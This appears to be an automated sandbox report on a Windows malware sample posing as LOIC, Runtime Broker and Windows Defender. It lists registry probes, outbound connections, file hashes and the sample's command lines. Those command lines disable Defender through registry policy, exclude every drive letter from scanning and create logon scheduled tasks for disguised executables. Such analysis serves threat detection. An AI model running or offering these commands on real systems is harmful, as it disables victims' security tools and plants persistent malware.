| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\LOIC2.exe
"C:\Users\Admin\AppData\Local\Temp\LOIC2.exe"
C:\Users\Admin\AppData\Local\LOlC.exe
"C:\Users\Admin\AppData\Local\LOlC.exe"
C:\Users\Admin\AppData\Local\Runtime Broker.exe
"C:\Users\Admin\AppData\Local\Runtime Broker.exe"
C:\Users\Admin\AppData\Local\LOIC.exe
"C:\Users\Admin\AppData\Local\LOIC.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\LOlC.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5F85.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Users\Admin\AppData\Roaming\COM Surrogate.exe
"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
"C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Windows\SYSTEM32\rundll32.exe
rundll32
Network
| Country | Destination | Domain | Proto |
| DE | 193.161.193.99:21265 | tcp | |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| DE | 193.161.193.99:21265 | tcp |
Files
memory/2028-0-0x00007FFAA4D43000-0x00007FFAA4D44000-memory.dmp
memory/2028-1-0x0000000000C90000-0x000000000114E000-memory.dmp
C:\Users\Admin\AppData\Local\LOlC.exe
| MD5 | e6b7d05c7a4369dd9112959795bb3521 |
| SHA1 | 80c60595def3cbb2d126e3c86c9a1b92572b55b7 |
| SHA256 | 10eb620d956a63295cd933a3bad5769b1f8b0eec8b3748569467c82fb61e295c |
| SHA512 | baa982104c839f9f0893dc2940b418fc64fcc9e964a2791c176f7e7795ee7732429287d84f5d37bea15882a6462eaa7f7996bf283a27a0718ee96054a396a806 |
C:\Users\Admin\AppData\Local\Runtime Broker.exe
| MD5 | 9c3ad681c33d3fb6934102a35cb7a2ad |
| SHA1 | d3630943b6af7b956eb459fc2e8f5137f2f5f8a1 |
| SHA256 | 9625d7f8c8ddded4818a03ec7912c0df6ce464a95eb055b01a15fe3aa373305b |
| SHA512 | ea310b840455b8279c72ccb8e45f27b6ec861baf66d223b584d790bdca6426b54729eb7c80163c8e6ce1e88044088c1167109be0cb9418935d70ef42a6bbd466 |
memory/1428-16-0x00000000000E0000-0x00000000000F6000-memory.dmp
C:\Users\Admin\AppData\Local\LOIC.exe
| MD5 | e6fa3028cd03318496852718143d256f |
| SHA1 | 4c85973d612cd1955163c244c9c334d3a0c507cb |
| SHA256 | f60a52512773b52def9ba9ce8aad61144d2cf351f6bc04d1c5a13abef8f3b89b |
| SHA512 | 29089eccd1e670570fecafdd682f0ec13bc55fb17cdc0938ff4c6fd32c55c1919e26fad5b3ffed78217a94a9e8aba768cdf092ffc85f6ab19fbede0dc0fae0bb |
memory/5088-18-0x0000000000D40000-0x0000000000D68000-memory.dmp
memory/1428-19-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/5088-20-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/2492-28-0x000001F8A1520000-0x000001F8A1542000-memory.dmp
memory/2492-31-0x000001F8A17E0000-0x000001F8A1856000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1sdungg.n1x.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1428-70-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp5F85.tmp.bat
| MD5 | c80a2e321f698e3ccd43038f7739e527 |
| SHA1 | 8a00eaf5485819a5c857ac70f03aa1881c9b09b2 |
| SHA256 | af4d2adb9ddbe125d769c3623ad96e8102cbd1a1dce6315bd818fc0219670681 |
| SHA512 | 197b38ab1b2b225a0067aad6f8297c8a5e84f988e319efca8717843fc293950211737663705b8555cd1e0951843588bc298aad517d9e37f4e9bc08efacc51286 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 65a15f6c9464167c6e8ac1ab275e8f2a |
| SHA1 | 50d77247b262e76f0ad3551d7c29d2464b11a082 |
| SHA256 | 2e469156f4329c3ffab494824102dd2f715e4753f62cfcb69db154394d88eb58 |
| SHA512 | d5290b8506e8d29f952e119a3f1c77d02b94996803a9f238ebc39e686312e1f7fb8b70443a9f12c5aaf7acfb15532b8c585493534a61c22f6579a5ebddc8ae69 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dee7d12c801b443129920af11520a8c5 |
| SHA1 | 566261c78314a3b566d2c48da9efae665c6e6390 |
| SHA256 | 7f3650e98831efe77880d47f812c3a3bb253446dae9f128ba4c15eb34e2f7adc |
| SHA512 | d86a353adec2fdc79b14cd8e63e97b9aa0a6601c99d1463a51a27a11519c9c30f48cb0af4f9cc9df49c82814526cda98a59864c9e60480547409ad46f6cff9e7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f0d86221dc5c289f819c27a18fa0a21e |
| SHA1 | 85a9e0179224022e74ced3070cd5a3faf00b6c54 |
| SHA256 | 8b48313c7e700ebbb702699d262f76d747f8837daca371f0ecc2369992d170bb |
| SHA512 | 3a9a762ba4c0c70fe7944c0686b870812e9cda9d21a99e4f2324358006f21652f570bc67c54d2ad1d70a2e1526a4d8ac94d20d40ec3833ada1937607b5860b81 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5791cc0f96aee1e61a467cc5f742d2db |
| SHA1 | 4591b5b8e7f92dfa5c80cbac92db93f19493012c |
| SHA256 | 30c23ff3cce5089d3167da344f7d0e261aef813d792cda80c035133914acc89e |
| SHA512 | 3d8b3b6ba4d4d0b6e5705b7bd9d8bc0fcfa45e1289cde16edcb993cfe303d04812d14fa2203e022c166df8a1cde3193c26cc850c0c2c3b66a722f402308d1fb6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6af8244e1606a227be0fdaae43220519 |
| SHA1 | 9fcaf8c61bc447c7a59c403dd9564991f6b00893 |
| SHA256 | 3adf1891e6d8f993d7c105d45e949ffec881595a35dc4a783903ebc64dd79e1c |
| SHA512 | 1ebeb3392252fb863a77807283fd3dc0f4da567a76606e83993f3930894d6c6c89a159ee779f3d7182f926a2e4053ebea1bbf25161d9e50a06c2466a00e06071 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 784767eea6fe6909f2812561991cf31e |
| SHA1 | be412d54a8fb7024d6991f52f4f0d4af7c988544 |
| SHA256 | f8b432e9cba50e369879498d4ce6551fb057ed0bc15b4bf9fb07fad0f0f57ce0 |
| SHA512 | a2b8e80031bc69620ee084f647a99f220e3e8d02a39f2ed52fdae6274f0d5aa70fda2e6f0a475dd971e3a09b5cefdd84de8de62ea7cb019510c30cc8df3b60ab |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0ebfd165e37055d39447ec792a24cda1 |
| SHA1 | e76d70edf05aa0ab3c1cfca0b489d5ee5c16e981 |
| SHA256 | 1e2b1de59d2d3358d179cc1b80a615c29ce8ad12ceba5ccf74a6e0ab59807625 |
| SHA512 | 9b469ee9f9c30a92a46a1df0755cb13b275fd7dd05405d07e4a9b348bdb42fcb36bfaeda3781b612e61feacfc59bf8f8944a4193c40815c6b0b79289c47717a5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 54a5ac41cb04add283ef259fe504095c |
| SHA1 | 97b5ee9de90628a804333eef4dfe362663686c0f |
| SHA256 | 4fd0c23c7b985f961eca7ef0d6f051bfc870a99c573e6caf50a08de6b428855c |
| SHA512 | c31a14ba9d0a1d32c689f901b0874aa7d67d3fb5ee6065160c3c0b90bd4815d1ee1761a43905f658feb63156728c77095724f068ab23fc6c8e9d4d2ec23fb4ba |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9d2531a3933e3006aa7711d827ec81e4 |
| SHA1 | 2d3a06b582537f34a5e93c16ff17cfb31e5eaf37 |
| SHA256 | 42f512fd7ed938c2e92ab4e55d6a1eaa77f615b8070fd247dc7435bbb0353fa6 |
| SHA512 | 55a0dd4a7423bd2a26d92e596493fa6086f9a224a0a8df71c5e79afc424fc32537fc3a65cf3b2b5383a290824ee295ee8d7eb4396340c7dc53fe1a1b040cab92 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dff6b8515fef00616c9e7d31ebdafca3 |
| SHA1 | fe92d7d821097f69f24eecf1a9606cc9369af9e2 |
| SHA256 | d19a6f55cf3e5717f603c18d85a77b4175e01c4014dc76f5335b3a386eee238a |
| SHA512 | 6464b6e6d4e630c66dc70f78e66a3896da08fc9a4adfb9a4aef4a9eab1396951bdf55495033289cca6871cd3d8582d98087ab5ac3e67aaae712cf308e6f39dda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5ef2a2123a04cc34bf01b9ea3b8fa915 |
| SHA1 | 1128591d05c38a9785a40da7be2205f7a083cfe5 |
| SHA256 | 2314498ba37a5c5339e896ba7a4f31d5de6af1004c3949561c5e471c8283a6be |
| SHA512 | f7fcad9baa765f04f7f9d89c6a43cfee2f1ed5b4ff0bb2d0f66a38e18c396238a4dae51e65abf9e38ecd07c87a8ea979733f131f6e99ebd434f449a9061e51e0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3be63e99ccf19a621fca5ec2606e7660 |
| SHA1 | fb973ddf6c9fdd73fc00eaf1a332c68f234af75b |
| SHA256 | 9ff307c4b9a5546bd8f6a39ce9bae8050ec57e4dfeee4c16cdf3b8ffaf8f1aae |
| SHA512 | 6a02b4517040efbc61be5cf73eb7aee68db88d3649a58b3bc075466e49cabf8678aaa1ef7b9f2004831011ad0e26658869827737c50a9076627d237c8168a217 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 516627eb5b159acc4999adff5fe90c04 |
| SHA1 | c8f79ae465d3232409194c0b241de5f010025449 |
| SHA256 | ac7b75a17d926bcaee3e2a47f6c74d4fdcfa41e449eea01760f7ee6a28b8d034 |
| SHA512 | 1832d4548ac6f1ffe32663ff3158b2fa0319067fe71a5fb92af72db5e6fe15b66c91178662dce01721c8755053c151a6a3819979d7478dbbbfa0657dc0fa3252 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5b5274b69e9e7c4d352fe958473f0cca |
| SHA1 | f437e3f395e059485a6064c5cce8c35fd59fa327 |
| SHA256 | 3604d396630667afdd1aff92596639a96b25c78e27ebb4e89ba6dfcecce83cc1 |
| SHA512 | 51866da6afd4ec9bc891c1289ee28cb91bb51911c513c38dddcdcdfb62dcbfe6ff1e517cf4b22156fb4dd2a2748d53dba6b7c3d61c6b97e21780e2b8515b16e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8298b06a061d68331ffc15f1fe2116d1 |
| SHA1 | 2fd4dc034a861e0120cb4052cd7c0ed289c6a45b |
| SHA256 | fd584555426e3f4923b2f9f0feb9fe070d5b8d4aa317783f729dfb454323c49a |
| SHA512 | ecc1eb6723056eeb2a073863b8f18c9610d9fd25b65267f1ed819777c1bf0576723225487c35b542831621f5384492c68d32b69c05aac727aca21b31113da498 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 89ca26ce97742db20cc26d8d68143282 |
| SHA1 | 3a95f558ba79d070c2926b295e13f613f1ad46b0 |
| SHA256 | cada41d61bbcd578070396803c052262fa6be6fb1f3791ce2feeda020b3ab67b |
| SHA512 | 6e9fa5fbb0bfae520a0ef110ddfd85a473892c41e5614b85bb5f17c5c7a332d3716a287d18a31ceabbecbd5fa1c63dd6aff1de4e317412538bd24f3dd90ce53b |
memory/684-728-0x00007FF7482C0000-0x00007FF748747000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 199eb8b9fc74ddc05b593eeae99773ea |
| SHA1 | 390f79d9414db1587c02c52453007c2ae81471bc |
| SHA256 | 1f56e75887bb47282e208f5628a575e344063a979be8692fde4a6eeca35b1fda |
| SHA512 | 2c9cbc0aee47a8fcce464c36740789374cc943105428e336bde2b756ae7c765bb5b4728b10f450aa45b503533f8f9a8a4ecd3e6d4901b4fe1a7b27dbb2dc45e4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d293e2ae458c7fd51385af4c083ae05d |
| SHA1 | a8aa949c986e0c50da7f41684cc81ad86d5497d4 |
| SHA256 | 2dd29ea944dbee71fd4458253f841d2ae1122751d684c6bd0ae5adcac6ef8608 |
| SHA512 | 62e886559bdb9d72c23cad145376fc8c0102bd3a6c5756144bfb6c12034a7fa424e4818391465b25f5a4a04dd8780aa19c876348451c1e5b880744f2d19039c9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 283f68751e33f23d16877b377419b903 |
| SHA1 | 0ecf396bc78a058ba272d49756e6194ddaa53436 |
| SHA256 | 846f46809a52c8fa10afae720eff2971a06cac9cf739b9464287a95c1066f2c5 |
| SHA512 | 9eaa91c417c7a096876bedf7287fd8c318f69fb839aa88633dcfe994a3005e35293d23d43eeab395cce80195f3ded43c1e6fe98d14db8ebf3d39d2d37d7b31a5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5d04082b10da21a7e673200cfa9e427e |
| SHA1 | 748a39b12ab49ab4635c971c5be55bc53dd43f2e |
| SHA256 | 303745047527df87ab6399f3bf47bfd0ba820f3d48c79711f0363f2930502397 |
| SHA512 | afbec904e7841be42ac8659ba28e9eaa2dd1d77954cc5c0a982bb40bc2783cf8d24c3c62402b4bb62253e8df25fb1a39d9aa28da7d55068aa6f194e83c42705e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c47eaad0c9f711bc0c5829a6fe920560 |
| SHA1 | dd7de5b35a0bdbcb589f83c46c252286d14bbaa0 |
| SHA256 | 303976a1c6929e50a0d9aa4c7819d615c2afd92957dea6b261fcf498dcacde15 |
| SHA512 | 237631c7286411919536df36484efce65b57109265dee00e50b2c8f085220630149cccd3dd4b18d6f9332313456401a28e72f092d4c079d8efe7ce4df66b1471 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 88470be2473b012e40f7227e251ed3d6 |
| SHA1 | 0ea63466eda2f6681bf45ebd9999bea1d8872077 |
| SHA256 | 90e351afb51e8d116163eb656da69ccfcdf44357d8b092c349502c47b57b9211 |
| SHA512 | e4828ce919eecdf6f3a8db45ae936af5025f9929af6775c846bdb6fee5ff2880ba08726755927f30912bd8eac026f19f319182dc4555a5175acd9b897dfe0b7c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a151a81d411958373cd852433cc1cf1f |
| SHA1 | 66509e344fea100f8abf76ede12ab100a7827c62 |
| SHA256 | 29fe328765b9e17ae6636db46b09a03da07bbcd9ded4a425534701a5d3f1fe84 |
| SHA512 | 5b24373da962bf3129e9d5b4b1a78589c7428466300e9c2935e48f21bee26d777b2e37198eb68d27533e3f214d8ae7bb06258e749c7ccc83f69c7ba501050085 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7a769c8567230c11372c30b81d516841 |
| SHA1 | c4a5596432bfd397306908889bf58b57d9a2dc72 |
| SHA256 | 6853ac5d99b3c0e74daec1b39f58c0c86160ee3d0275f9be2688c8a13d00f2c2 |
| SHA512 | 35104c064f5aaf879090df4910a97f9b9759ae39bcc3688beb7dfc3cbc96f79b23f752f712bb7706715ebd9ec8899139cac5c19480e20421b56cd40b145660b2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c770e1bef4e361f6cd00ca3720dc439e |
| SHA1 | a6563ea8e18d442c287f662bb1adafe269a65ffc |
| SHA256 | 8e345ade3d714201af8912b864c2e0fdc46fa3f38eeb1178f85fcee60e5a04bc |
| SHA512 | 87e74bbcb74cb32d5e067df4d43d5a4d8e943822d8743e3bf653109db23d998a0b4c2707685bbb97003eebe765f8404a6bc67ad21667d105fd6d479f5a01f86c |
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
| MD5 | 1837aea22a774bde2cd2eca02b5995a0 |
| SHA1 | c00b11f612716a5b9f282264538ddc2e041d8981 |
| SHA256 | 3263283f59723e5487b128439d495da10b06f84a84793da717a35e0dd7e3b905 |
| SHA512 | 9f479883cae36152dd2d2bf55e35d2ab05783e214479d12b957d316e4d3c16b63d9dfaf11f3752f9831c182f7c4b06261849042999bac4544fed4011c9fad67b |
memory/4300-1172-0x0000000000F80000-0x0000000000FB4000-memory.dmp
memory/4300-1173-0x0000000002920000-0x000000000293E000-memory.dmp
memory/5088-1174-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/508-1177-0x00007FF621B20000-0x00007FF621C0B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 22:13
